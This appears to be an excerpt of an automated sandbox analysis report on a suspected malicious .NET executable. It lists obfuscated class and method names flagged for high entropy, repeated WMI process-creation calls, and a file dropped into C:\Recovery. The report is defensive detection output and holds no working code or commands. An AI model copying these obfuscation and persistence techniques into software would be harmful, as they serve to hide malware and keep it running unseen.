Source: XPC5PMKegV.exe, Ra53WHDsyCfioLYDgw.cs High entropy of concatenated method names: 'iW5', '_7WJ', '_5CE', 'B28', 'pFo6kP4J05waL3egWJT', 'whGZ6h47Cn4j3ruujQX', 'bX6OYJ4xKki4dJec7WR', 'r9JI0C4EwvVYcSIWeWt', 'iWRKC14PsUcGRC79h82', 'mdp48d4pP1pwIDpmgkB'
Source: XPC5PMKegV.exe, eCStXIr9xxQuvqyW8NK.cs High entropy of concatenated method names: 'kKlJUbp9e9', 'yh5J7uajNb', 'E3AoHKPjfEFiUlCry5D', 'XSnTyGPnMmIKygQOHrp', 'MC2e8vPowwppQOGUn9M', 'Hsc74hPf5B9YGX5ol0h', 'gIFK81PbjbiE72M3OPY', 'ejTGbDPXujrcTqFOdwt', 'QOVJibP5iOWjS4FpGSs', 'CZ97C5PSXSOdSkcu1oI'
Source: XPC5PMKegV.exe, TSdLTEpB6fHDtZFMVqW.cs High entropy of concatenated method names: '_912', 'SuF', '_451', 'BdL', '_782', 'gY9', 'q92', 'ZYw', '_35s', 'I83'
Source: XPC5PMKegV.exe, yEdGe8dL8ulrEXaocs.cs High entropy of concatenated method names: 'P1z', '_7WJ', '_5Ch', 'B28', 'BSOkyt2pmH2RPf4DPIg', 'nxgyC32ckxWL14GBkKl', 'drjUwh2VxRosqaDAtcJ', 'pZ4txd2erD8Hw8ohD4E', 'TNVOn32IwCiBPRBuNup', 'oRvQ3c2wB0LPgkd14t9'
Source: XPC5PMKegV.exe, dH1Xc1LAPMZxLIQlI8T.cs High entropy of concatenated method names: 'uUe3XHOiPp', 'xT83SubndP', 'LVF3s2bPHl', 'UIP3rvPY6O', 'CvO34IKcwQ', 'VNg3yHY9ao', 'XwX3vNV6Kh', 'duN3DiNOqv', 'PL531DdWLn', 'Cdw3IWa8eG'
Source: XPC5PMKegV.exe, UiVNbAql4hhBLby4Ts.cs High entropy of concatenated method names: 'sd4', '_7WJ', '_2zX', 'B28', 'FLaN8V4elf42Cqd3Giv', 'SwgLIN4IjImTBBb6gbF', 'PmAb1A4wQexGGFXlcgV', 'b1Jkeb4ASGdHAsIK2nT', 'i4alUB4MfAoYXJNYAR3', 'dMJdBh4LAohvfT3DLps'
Source: XPC5PMKegV.exe, pnNUTeTzesg7nAYyeVY.cs High entropy of concatenated method names: 'HqQvjYvmer', 'pZ4vKJVBmF', 'uklvaAc2so', 'yM2jpUj9weBx8ZZsAGH', 'pUNj6ZjaVUFsiZ6RFEx', 'NwYuvhjYBku0E6rlDUQ', 'uF6x9FjK1v6rMxk28Mm', 'HichHNjWvRlGonadMua', 'aAiSshjg4xHlrmsOClH', 'obSs79jOTnEMStgj4mn'
Source: XPC5PMKegV.exe, m7Yx3oK0kYe6AHj9lL.cs High entropy of concatenated method names: '_1h5', '_7WJ', 'TyQ', 'B28', 'qxMtCD2YWgs78ciTnxx', 'zTWxvh2KnmqpQreLI7r', 'bFgLsH29HTwfUsYG70r', 'lLMyv12af0Po5dbauvt', 'E6Is5N2WkfQedYctsFG', 'RpV8n82gt7Y7DYDUQXe'
Source: XPC5PMKegV.exe, vf2M6Sp9QJNAD4s7aUB.cs High entropy of concatenated method names: 'eQRIXTH4je', 'qsJISsCagk', 'JV2IscFRu5', 'f7o4hDoLts6WfEVw4pm', 'Wbi45Wo0jdPE1ZiTWHx', 'q5HUV1oAq4AcQEghFyg', 'W5mUidoMjL58fcqjK1s', 'UpkXgmouoxwfY17aP4M', 'lFEib1ojAs29qMReFw6', 'XiLnq7onSg5fMyDf7rp'
Source: XPC5PMKegV.exe, OP7JyVLE6htJ0UxVpp3.cs High entropy of concatenated method names: 'BS0Ygy8Ahr', 'p2yYqv4Dka', 'UrDYGloXnF', 'agJYAdZnqY', 'WgcYlRjXEW', 'saweVn1Cwu6pjOypioE', 'XAjdvE1FG5534QjF0nD', 'OrGHNY1Zo1L9STDSiyG', 'Eci6O91DoF123v9mrHO', 'mWqGvC1sstHX8p2hKVt'
Source: XPC5PMKegV.exe, zdFAVE6SWJ9Tbr5etQT.cs High entropy of concatenated method names: '_3B5', '_7WJ', 'D4o', 'B28', 'rb5NH9JW10QNl6ADSGH', 'N4wOpJJgedqZYIyYwP9', 'fQAiXxJOdo1c7bsPPE5', 'TCkRrUJUxw5eqYfe7b5', 'oYWL1DJTeA4WqwOpFmc', 'tVODxBJNFT41op8ZgP2'
Source: XPC5PMKegV.exe, yaLo7dN4I4Wc81sZuQ.cs High entropy of concatenated method names: '_8k1', '_7WJ', 'B73', 'B28', 'LHkdh6GNxfoqbyefvW2', 'qQW5UaG6eLApA9If5tr', 'BMrqM0Gi1o3OOR8qlfG', 'YIC0VwGya8X4sHTYryM', 'Ua4XnyGzbRg6f3AFXuC', 'gj65ZU4qXuAAU4pkD8U'
Source: XPC5PMKegV.exe, e3ydsorNghN6ua9ppro.cs High entropy of concatenated method names: 'FnTs4JpgTt', 'aRcsy6C6TP', 'zdbQc1Iq6EeRdm0s34W', 'Mwho8yIkiymr0rF9Z5d', 'hWetuZeySmpgoL3rajP', 'nfHEIyezUlmjeBbFqsf', 'CQWsOie6wJ', 'gXowVlIBbVbj3x65rs8', 'p7SLeRIrkC1Q2T2BLcc', 'Fs808qI4srZ3VwtwWaS'
Source: XPC5PMKegV.exe, lKCHso6XXYUPE6pcQcJ.cs High entropy of concatenated method names: 'SRCcD92L0k', 'EAKc1aV6YW', 'y6RO9BJxbnj1kLoWwIg', 'WrhdYDJJjoP8ttZQqFn', 'cB7cLqJ7yOKqsB5p8d7', 'VCuG0oJEucdLP35hrJR', 'D1l6dPJPU6xu0LsQcAg', 'rfKRVYJpDZtsWvpWDkY', 'OkUZ6NJcoN862WEAWOC', 'W0PyRqJVuBOYEaxKyHx'
Source: XPC5PMKegV.exe, Oi1qX5rn54HA5LWst2e.cs High entropy of concatenated method names: '_0023Nn', 'Dispose', 'aWNSf1tEOP', 'uW8S0g6Emb', 'TWPSxS2vVS', 'TLRS9ZQDM9', 'TpXSgvWE8W', 'gcyi4DePjeDOtkpbmR0', 'Y7vFFxepKA2YtY8jT3b', 'p13IK4exPrKUVg0G6Re'
Source: XPC5PMKegV.exe, XWgth7zAKmQlfDdxWZ.cs High entropy of concatenated method names: '_4W2', '_7WJ', '_6R7', 'B28', 'sX1oH2B4M8qO1XKyhQ5', 'iXNPBmB2BMmuLSQpvMk', 'iADGb2BByqax1UMmDcD', 'JAwf81BrZN0FdyYuMel', 'v7eQPuB3awao9B2BSBI', 'Mhw5qYBRxhC3Fpe4Abb'
Source: XPC5PMKegV.exe, c8ibLBUi5NXBa1AOvxw.cs High entropy of concatenated method names: '_6u4', 'mQ9', 'b08ZYHKsW7', '_639', '_132', '_775', 'OOV', 'F1i', 'M4T', '_7dM'
Source: XPC5PMKegV.exe, mTGbTepf5luI9wGdk1Y.cs High entropy of concatenated method names: 'JwxIBb4Bch', 'C9tIfTdJ8s', 'uxZI0hFGl7', 'dZIIx5K6CO', 'XETI9lMoVl', 'Kw6LsiohtnEOZSoX3l4', 'd3bLhtodb2y3ujFkTe7', 'kj3s8yovfsnyQkR9LHu', 'YRIDA8otauK3DNmlPDJ', 'uBn61HolXxy2Vb4OVAd'
Source: XPC5PMKegV.exe, v8bQYK6gGtbc7JJ4RgR.cs High entropy of concatenated method names: 'J96', '_7WJ', '_95G', 'B28', 'L2yKhqJLWFbVqVrJnSs', 'voVIiZJ0H4FEyKVGK00', 'bXI8XuJuIOHOBIS5Ey7', 'PSxuVHJjKA2R0mmsqSK', 'eF0xXSJn3UESQPW5Zwr', 'FwsXnmJopM7SE9ASalR'
Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.cs High entropy of concatenated method names: 'C7b3NkqYAc', 'Gv53hxOwxG', 'QHr3oyBkEY', 'UqV3eAqEeT', 'Dwd3uo4JMp', 'ViD3ES93Xo', '_613', 'IO3', 'Mp1', '_7FY'
Source: XPC5PMKegV.exe, vE1YYuTVv8jMv0AVwES.cs High entropy of concatenated method names: '_8o8', 'kLqMeRMLWgiqFd68Ror', 'EVnuPHM0km9bXNVGoNi', 'cu1kfPMuFpNnlSrTirc', 'w7FoooMjvw5iSoy8o6p', 'ap30llMnxfUxERai0LY', 'jHagxFMot2dRcMk7SrO', 'bc4LjyMftPS7JD3BGP9', 'Pv5VG1MbR1kQSxI88fF', 'bKUDUGMXOfxfylT9wWm'
Source: XPC5PMKegV.exe, XBTZN76hoCXgoYkol60.cs High entropy of concatenated method names: '_5X2', '_7WJ', '_4ws', 'B28', 'PcnJcirUBUdVJNMJeYH', 'mbIHRGrTWNmcRhoAoZS', 'K7xOyTrN99H3aHAdYUk', 'PpqOhTr67jd6FVs9OMg', 'cKbHpdriVnwqKxoqbIa', 'hALbbZry6Me7rsR4A2f'
Source: XPC5PMKegV.exe, lXoOP5QTREP9xDLYCI.cs High entropy of concatenated method names: 'cvAfloN0H', 'Rvl0P3spn', 'kYFxlFjvw', 'L5lBGgkQPiWM4jYfeTc', 'ELDXsPks228pXv2Y9mV', 'e1JqZtk1ZnUU7usmybP', 'HHuTtjkvFguym0L0k05', 'zMC7O8kt0gek4OWcvHc', 'n6dMQOkhLPoWqCk0NIx', 'yWTtVZkdm5WpuvIYJPS'
Source: XPC5PMKegV.exe, lhaS2MLTXsLTkjdFXaU.cs High entropy of concatenated method names: 'DStG1dZbkuBlXQ1D21h', 'p80hBmZXIDlO70m6lU5', 'Af6PN8Zo1b4KoWDFRAr', 'Kyac6AZfGY4kriT0Q6O', 'trWnY0064i', 'QGDgbKZFv9Bt4EqXnEG', 'P66CywZZEojEb48TEyH', 'wvYQcQZ59Oxf4RHirye', 'ygoclQZSN1d6AaYYIr1', 'vFLyVnZCNlbx2n5rgXY'
Source: XPC5PMKegV.exe, T9dPy4UqN7utw0tnUw4.cs High entropy of concatenated method names: 'K8a', '_117', 'd7day5iD17', 'ki6avnoc3m', 'ThhaDXonNf', '_8x7', 'Irc', 'R21', 'B53', 'zP8'
Source: XPC5PMKegV.exe, vo1wu1T6dJaT5w0DnGx.cs High entropy of concatenated method names: 'mTCra1Up9L', 'hV1rPU0rm5', 'gctrRm1yre', 'mnarpeRd0K', 'gWFTFIw2dCZJjreDwFb', 'jaERvnwGG9maoG6VKB7', 'Soi34sw4Sq807EJsHLG', 'l6dljqwBXqDyv6D9Xpm', 'YikDItwrfC9AIywq5S7', 'UyDd6Aw3HBfE2VEdeXL'
Source: XPC5PMKegV.exe, Cl43QepmOtAMcFsmL1I.cs High entropy of concatenated method names: '_56e', '_248', '_86A', 'vj4', 'W5n', 'EDxWCtG8CG', 'O5wWiYyfil', 'a6B', 'Khk', 'H1w'
Source: XPC5PMKegV.exe, yNrGelTgmYGZ9MgvvgN.cs High entropy of concatenated method names: '_348', '_55c', 'F36', 'RU3b48ip5n', 'yXtbIqKarg', 'lw8C0DuSgnfj7xGgaO0', 'GPZo2uuFKZ8BouZLb0b', 'FFuuyNuZeUYhFQS4YFq', 'bLaX6BuCaP2QVfCYGNm', 'uT5B0ruDD6Bl1JFZvJI'
Source: XPC5PMKegV.exe, y7DvqyrIg8iyDOvbwQd.cs High entropy of concatenated method names: 'XakJz59fFZ', 'nHBXtw0UQQ', 'nKHXwjVJi0', 'rYoXcjhXZ7', 'VCrXJC3Dtn', 'Rb5XXG9ciS', 'L1IXStSH0C', 'aeJXsYGOkY', 'snbXreZwRP', 'RaxX4yq1Aa'
Source: XPC5PMKegV.exe, KKQfgQUEn3LI0XDAIUd.cs High entropy of concatenated method names: '_518', 'E6y', '_17E', '_79s', 'XCq', 'vm2', '_5yr', 'dlO', 'Q7M', '_59C'
Source: XPC5PMKegV.exe, PiegUarrZrIu2NpVPEw.cs High entropy of concatenated method names: 'tfJcoCkUOt', 'EhYceJuMfq', 'z2fcuySynW', 'mo3cEsycOi', 'hd0c2sYnMK', 'vjrcHNA1KR', 'hZp9e5xwOLC1uJ8xNPb', 'ppfabGxAI4SS2oFC2JA', 'XdbF6BxeLCc7Keyd36p', 'tqqB1RxIo3mTj0Fy62k'
Source: XPC5PMKegV.exe, R8IPI66nNydVJAOWKZV.cs High entropy of concatenated method names: 'Y23wUVNIGk', 'Vmm65AHQA1WuA2nhaxs', 'eX2iiyHvd3lUcUu2BRQ', 'VNvxf1HsBZM7uVtZVLB', 'Fv3D5fH1n5jbGtlJkXq', 'IqYbtZHtJhSRy4gofSR', '_314', '_7WJ', 'IO3', 'B28'
Source: XPC5PMKegV.exe, OOIlrKLkTG0jrXpeMce.cs High entropy of concatenated method names: 'EXj2FBQJr5DOQwnZeEB', 'oy5SmDQ7mEFmNBSp6TQ', 'R44978QR7oY5IviHAf0', 'l6tM6OQHJ480Lxwn96O', 'UkYqHuQx1d9jUlcUeSN', 'CeiDE5QECEpT64kR39I', 'vR8SolQPravNaVeiMg5'
Source: XPC5PMKegV.exe, enXgVk6KGg56u0Jag5M.cs High entropy of concatenated method names: 'SUicV37jG1', 'GHU80e7roxo9oCWdKuI', 'i7hcgT73nAcLLvHwONn', 'xVJBFo72Jct0LwpP24L', 'Eo19i57B65ijVC9G7dd', 'dPhYud7Rc6iEuMbxpxe', 'W21', '_7WJ', '_294', 'B28'
Source: XPC5PMKegV.exe, S7e5erUHxr37upvq8hh.cs High entropy of concatenated method names: '_5U3', '_52K', '_6a8', 'oc7d3dnj2o', 'T5cdZ8ZPrd', 'JQqddUi68p', 'MvTdjDfX36', 'TPedK2sDV4', 'O9MdaFkqmm', 'u3Ct3jdlJoOsbW8hcwG'
Source: XPC5PMKegV.exe, qxPm6oTdim0cupUcEK5.cs High entropy of concatenated method names: 'oB5', '_7u7', '_4U6', 'QkJvDbFMfP', 'QyAbPrwq8J', 'HDLv1N2wKv', 'YGIbY78mVD', 'cWUu14umBsXBww3EfUe', 'BMn5HJuY8X7qcXAuK0a', 'CaVEHDudOIaGaqWbyn5'
Source: XPC5PMKegV.exe, s74Io06BHr2pCjEhhdI.cs High entropy of concatenated method names: 'xwh', '_7WJ', '_4o3', 'B28', 'ykiLu3r3l8aIBd76wI1', 'GC8KqurR5Cul0i0v1V0', 'rFDSXIrHBW3JRRwV5MU', 'b4Krp3rJ120qxD2Osym', 'i5kTPWr79J2RT19hJNG', 'uZyr1IrxVlsrVGnTx08'
Source: XPC5PMKegV.exe, i8pocKTsgsG0IkhvhQS.cs High entropy of concatenated method names: 'qTn', 'rMM', '_561', 'P7I', '_6pi', 'VqM', 'H2An2c0Ip3wicG7Ny9I', 'Yb4rrV0wdoP0U9cNemA', 'kYJPPI0A4CoAc7al9mr', 'fa7aq60MIqiOEMREpjH'
Source: XPC5PMKegV.exe, mmOEm8p5CSZgC0ko5an.cs High entropy of concatenated method names: '_79V', 'UnI', 's58', '_442', 'aNy8tNel1R', 'Eca', 'WtI8wsI5Wr', 'YiN8c73DdP', 'Y42', '_21Q'
Source: XPC5PMKegV.exe, AudXQJUUixdtQM6BBRJ.cs High entropy of concatenated method names: '_77s', 'iIQ', 'vN9', '_6c2', '_4d1', '_34n', 'Jx4', 'nkV', 'k4X', 'ZyP'
Source: XPC5PMKegV.exe, rXFcRtpLTGp6O18MHSV.cs High entropy of concatenated method names: 'nSC1OQGxYO', 'Jt05BPnumMPpFWjxBQL', 'ayl32gnjeJaGfRXSTrR', 'w86Kv1nLU6QVxw71f8R', 'QYGVASn0Ce9Xg2BFSt3', 'Tx7vPSX8Wi', 'g2pvRIpsg0', 'NgWvp911MF', 'YeBvB6tA3m', 'AEnvfgsf7k'
Source: XPC5PMKegV.exe, Hi7dH5L4rVvSQPVg2PM.cs High entropy of concatenated method names: 'EN8', '_441', 'eR1', '_284', 'V32', '_8BX', 'Yh5', 'Kg3', 'n91', 'y2f'
Source: XPC5PMKegV.exe, YqypoILMY3VB7WPY2PE.cs High entropy of concatenated method names: 'T4YY5x6tGt', 'RFTYNpAoCA', 'igdYhZFruC', 'R0YISo1hM9RSNRag2OO', 'NQsxNU1v0ySAw4aOCOr', 'zSV9n41tdMvGMovk2Kr', 'JMycAf1dTdkWqE5jKF8', 'tMguly1lW2HJQKXnNZD'
Source: XPC5PMKegV.exe, ah4LpdpuUH7VAKThrBc.cs High entropy of concatenated method names: 'b67', '_943', '_2E2', 'P9S', '_7KZ', '_184', 'm97', '_2RG', 'wsE', 'o96'
Source: XPC5PMKegV.exe, oQb8nHUr3wNVABu6NEc.cs High entropy of concatenated method names: 'sJtZ43KauV', 'SBvZytQy9U', '_431', 'YkLZviH3lO', 'xQMZDbAbDa', 'xqJZ12h97G', 'yeHZILaJLM', 'zf0s8TtMEwgLlXpHgwj', 'L2aPPBtLXykVhSwIL3x', 'HSfHq3t0LyMtqyq6cFY'
Source: XPC5PMKegV.exe, zjjGX4TX1grg0geHsML.cs High entropy of concatenated method names: '_2P7', '_79b', '_16R', 'aRgvXUC6If', 'wLhbF4rG0m', 'rv2AObuIbhAQfxYTTtT', 'z6agM5uwQNOhHi6KIA4', 'urOD5ZuA6kCETXJ0vme', 'FBAovFuMRIIqGajH4yX', 'UrRR95uL5JMyuAhJAaa'
Source: XPC5PMKegV.exe, cURt8D6W9fRgffMVW9j.cs High entropy of concatenated method names: 'o7twawKPxq', 'DgrZp93IQ7h0KFbvp8t', 'z7153e3w0VBKkcavRTd', 'wBYttM3VZRsCj00pc92', 'gwGZL23ehfPARjRZnDs', 'I5s2F63AyVNk1qpL8mx', 'qKuTqx3MUtAEkoVwx6O', 'VWXcAr3Ly9MWBr2E4ss', 'rKhBCo30QuVLkLBWEwZ', 'K9F'
Source: XPC5PMKegV.exe, WN9CqqUtiEwAaQv9Fqf.cs High entropy of concatenated method names: 'TqIK9Vf9yX', 'JIX9O8lsJXUnxaHtipr', 'VGnLxYl1tKUwVKFN8nA', 'l4YHYWlCQLihowZL4ul', 'u94OVflDyReSfG1pJVU', '_8e5', 'DFsjExC3Wi', 'E75', '_2e1', '_127'
Source: XPC5PMKegV.exe, FenpyjLwPCfwbEEXR0I.cs High entropy of concatenated method names: '_793', '_19i', 'j2m', 'Yxs3kxR7FN', '_91O', '_7x6', 'F7G', 'ReP', 'cA7', 'ATW'
Source: XPC5PMKegV.exe, Xr4klE60dIStoOfaxsx.cs High entropy of concatenated method names: '_71I', '_7WJ', 'TO2', 'B28', 'URNoZbrAVGVf45mGvRY', 'GiRHeIrML89nHr1ByWH', 'ld88whrLm7RXTiNDOwN', 'r1HyTcr0ZF93LiLKsjy', 't9T0uHruAWHVJPkd5Ir', 't5wfQZrjqficcx2Iqo0'
Source: XPC5PMKegV.exe, BraILGoZbsvlMgZRst.cs High entropy of concatenated method names: '_3C3', '_7WJ', 'S9L', 'B28', 'OYHlc7ySn', 'HjpuYc8DdR546k9ieWe', 'Bq1noh8sO7V6ntcbtcu', 'zODreF81B53382mf0Rs', 'AfA4gu8QLrF7SJsYhWA', 'aKjr7o8vu0ounwuEHhL'
Source: XPC5PMKegV.exe, v6xvNMjq33JygCIfgl.cs High entropy of concatenated method names: 'HxeY9IHg5', 'Yg23nKx2v', 'vWYZ8XTCP', 'xtkdkmt92', 'bx0jbnn8A', 'EmYKiDEkW', 'kQ7acmJjn', 'bUsCYIk3n0bLg4bdM0n', 'xdCHsLkRMjTi0BvXXHI', 'AdfDlYkHtXsAjvdxktc'
Source: XPC5PMKegV.exe, XnHcmU6sNgmgeTEWQeh.cs High entropy of concatenated method names: '_88F', '_7WJ', '_461', 'B28', 'd4REik3no62wAjmv5JC', 'iwCo0O3oF5AYOwSp67U', 'dAPYiQ3f7nllffwVPrh', 'zhldu33b7rqQ3RcXMUW', 'MxDHxU3Xbh4Pa9aQVFk', 'i6aKmE35jsxy9qc0mo1'
Source: XPC5PMKegV.exe, ExFbTxTctUxeJ6gZ2sm.cs High entropy of concatenated method names: 'Iru4lDiX9B', 'wEq45uLBSL', 'jHD4NkrhHA', 'ghv4hpIOn0', 'ejWqnsMv0C5ZQDkdPZu', 'Ox8sMEMtyWlApcBvxKs', 'IExsqEMh202rmNawafV', 'PCrvQpM1QVjfBcDYVET', 'rgII1nMQrLNUdO3lxXn', 'bgHum3Mdbv1lhKFRDVV'
Source: XPC5PMKegV.exe, emQcjYTphjRmG4e4fpO.cs High entropy of concatenated method names: 'g90rAIJlhk', 'bv9rlgqeCI', 'dJsr5g1YZP', 'IQ5rNHeBFd', 'u74rhUQsDG', 'lrlroskSbW', 'uuqsOTwD9THOprATYHi', 'FtVdOAwZZwg2BilNSQe', 'U3pvL7wCKWopAb5Wpky', 'uLZQH5wsk76hWEBQbVH'
Source: XPC5PMKegV.exe, fJvHgir7Sa8PWpIwxxY.cs High entropy of concatenated method names: 'UR1X8C7fk9', 'TCvXWOtkfi', 'JO3GK7p59S5k8rCLdEc', 'Uf2rIDpSlDL8sEoR6O2', 'DqsTS8pbGjSgMJChN18', 'iQHiywpXJkadjhQ7r6o', 'WZErWYpFdBnbNd9DyRo', 'qKkgrjpZwYp59IdSqMe', 'sfH6E1pCvKDqkRo1pF1', 'AEM7Z4pDE1cxOIfmh2m'
Source: XPC5PMKegV.exe, KMFatX6aIoqOO90nguW.cs High entropy of concatenated method names: '_155', '_7WJ', 'viq', 'B28', 'Caa0qwBNpOf4DQRhu00', 'jTTH4XB6nSriIJsNENF', 'v3PZlOBis2hPj3bZF92', 'icwkqEBye2lPmLwRgC9', 'fVEJrCBzHBLqQ1DBmDH', 'XmlBK2rqB9uUu4B8JI6'
Source: XPC5PMKegV.exe, YIN46I6bPIG146HOuBG.cs High entropy of concatenated method names: 'Euhcw0v62P', 'CmMccSv0Z8', 'dSGcJsOcxJ', 'KdEMRbHOyYdJdjqYoxe', 'IRu0aXHUQHMactmfFgT', 'Nw3u5hHWl4X3QDvpiif', 'BtlULtHgDlsVJF0Ysfv', 'Rgf7rEHTTumWjO0fIxK', 'a0rvjiHNux54YZFf968', 'hr78ScH6EKMbJ1mhL3l'
Source: XPC5PMKegV.exe, pc97v63xoNilgjE5dd.cs High entropy of concatenated method names: '_9Qy', '_7WJ', 'M4k', 'B28', 'Fva6cm8i7SP87o4r33Z', 'ckRwne8ykMfEi4pBRJK', 'G3dZ3y8zpaMRdsZPYPc', 'ALkbWuGq1rfEHVV0PyA', 'T76tPqGkfy3AoMDgfdP', 'tmvLKFG8Q9jEWvyGPLf'
Source: XPC5PMKegV.exe, gpVoPR6MnR9rq20vqqt.cs High entropy of concatenated method names: '_84K', '_7WJ', 'dM7', 'B28', 'v1Kg3MR13EmAmMOH18n', 'sYJUbERQ0dZIefmpkLI', 'y4rpY3RvRfVoiMRYWGe', 'SkEfVIRtco7nJUQL1oS', 'tAZw4fRhQM4UqxWsWeY', 'm1tvKtRdoIcU9IdQV2O'
Source: XPC5PMKegV.exe, vZcZ9lLvOdqRkTgSSt3.cs High entropy of concatenated method names: 'md7YoYnEqj', 'sWAYelHPwL', 'm0hYuc1y5O', 'oJ0suO1KwOIOkksfT32', 'PQwfA51mbei1sI2P8oG', 'eRQpr01YO2i35lsN8iu', 'Eu5CIy198TprDrcAgIf', 'Gdwmis1a3XLLSbf67A0', 'l1xEmN1WBo0XgSPlLIJ', 'mcGcMl1gX3MHe02m3iV'
Source: XPC5PMKegV.exe, ToRf81pKKx7PUCnYXGA.cs High entropy of concatenated method names: 'NCaC3VLnUk', 'gkCCddsJ8l', 'dH4C8HMpQa', 'fx3CWjdkEN', 'U3MCCJL33r', 'gsPCijVs9E', 'EWvCOfouUo', 'UobCbdpi6y', 'RjuCTojRkR', 'BArCVbOFIN'
Source: XPC5PMKegV.exe, Lc2D1kpEFFdl1WnT2Ca.cs High entropy of concatenated method names: 'BDC8B8ErwO', 'B0e8felmwZ', 'thg805PkYx', 'XJp8xFyUog', 'DQ2893B7mk', 'PX4r9bfjgpcaX5fdLcY', 'XkfuuTf0vIu21bTHxYg', 'iGHOQCfuBLH7POr3LTV', 'qC4JSofnl1NZsNvqwec', 'fqN9b5fogGqRXgCTKmB'
Source: XPC5PMKegV.exe, GJrlJXuKAq1ko9Y3Q7.cs High entropy of concatenated method names: '_4I7', '_7WJ', '_98d', 'B28', 'pil8IY2TKDVusHwN18H', 'guZACt2NRiOvmsWMsA3', 'JxCEU126Mh92HPaa4uF', 'ICxoPa2iOjbG9pkX5Fl', 'NdShRW2yMDRYIstOsld', 'aNmTE02z9RLxCX4S6Pe'
Source: XPC5PMKegV.exe, fcrO0r6TNPeWDGnraTV.cs High entropy of concatenated method names: '_732', '_7WJ', '_1t4', 'B28', 'O3WZm8BSeZ66XDlPlZj', 's3DKXfBFLBmTWdFEDnK', 'IRByeIBZJvqJGUSaYsH', 'UtQhF5BCY3t8dRLEypS', 'cBEUrCBDqYRUtYBJ9kD', 'hinNAdBsSEK3HQNkcLj'
Source: XPC5PMKegV.exe, aYA5pTUsFLsGxwxURbV.cs High entropy of concatenated method names: 'ogRZnIE5cO', 'pxsZMHUsS5', 'aBeZQ9Fm3n', 'OC0Zm6F9P7', 'hxWZk4Fctu', 'LqF6DWh8DvDDTNZCl3Y', 'NZcZ0khGhCY9iFOquQy', 'suNLuCh4P65yBwD2rXd', 'zrjHAVh2rIRigZTw048', 'RpD1YahBaQpnDxDvs6j'
Source: XPC5PMKegV.exe, wkRtMcrjodS8Q05oFyT.cs High entropy of concatenated method names: 'WYyXMhB9vV', 'pxEXQAsOYM', 'eUXXmJpieZ', 'Tm3Xk0nZwI', 'NkxXYxSklD', 'QcnW7vcB0LiPDlDX4C9', 'KiAD3kcrNy4ZPNpTBLw', 'WpFkuCc4AaDCcpCh8J2', 'bSTgNwc2jmFE2AVZZGJ', 'zLwcjfc3jXZnKFM1OM7'
Source: XPC5PMKegV.exe, wxkLHYngCXJyWVhuQT.cs High entropy of concatenated method names: 'a4d', '_7WJ', 'Lq4', 'B28', 'tn2xLuGsP5jZxpZL10C', 'fZhKwFG16aBwpmmh3S9', 't9K4t3GQcBe3cGY68Al', 'fXJrHDGvSst4iOegyUW', 'yqC62VGtuFb84YyctVl', 'fBHEwrGhkDbXuXmN0Au'
Source: XPC5PMKegV.exe, Ogvq2w6V8UPJloOWYuA.cs High entropy of concatenated method names: '_16M', '_7WJ', 'QAc', 'B28', 'jVfpxjrbIhyFGEryxNQ', 'raDs5trXkQd5Gjriy8H', 'K18Vlkr5NdHq3EokIep', 'shkyrorSdHwl5STlHjs', 'vWk0dTrFnOJ6UP1hqvU', 'Qjy2HqrZcp0OrE6t9ik'
Source: XPC5PMKegV.exe, TrHuoypSmf5stJTRsW5.cs High entropy of concatenated method names: 'VUYWU8Mgy3', 'EOfWfB5orW', 't98W0NAYg3', 'WQTWx3Olgm', 'aQgW9YOPXt', 'HEPWgEGsAA', 'r9AWqEmMGa', 'XoJWGvADCe', 'm44WAE0kJZ', 'GrcWlC2Igh'

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Recovery\xMLVfJVxhYAkoCJ.exe Jump to dropped file
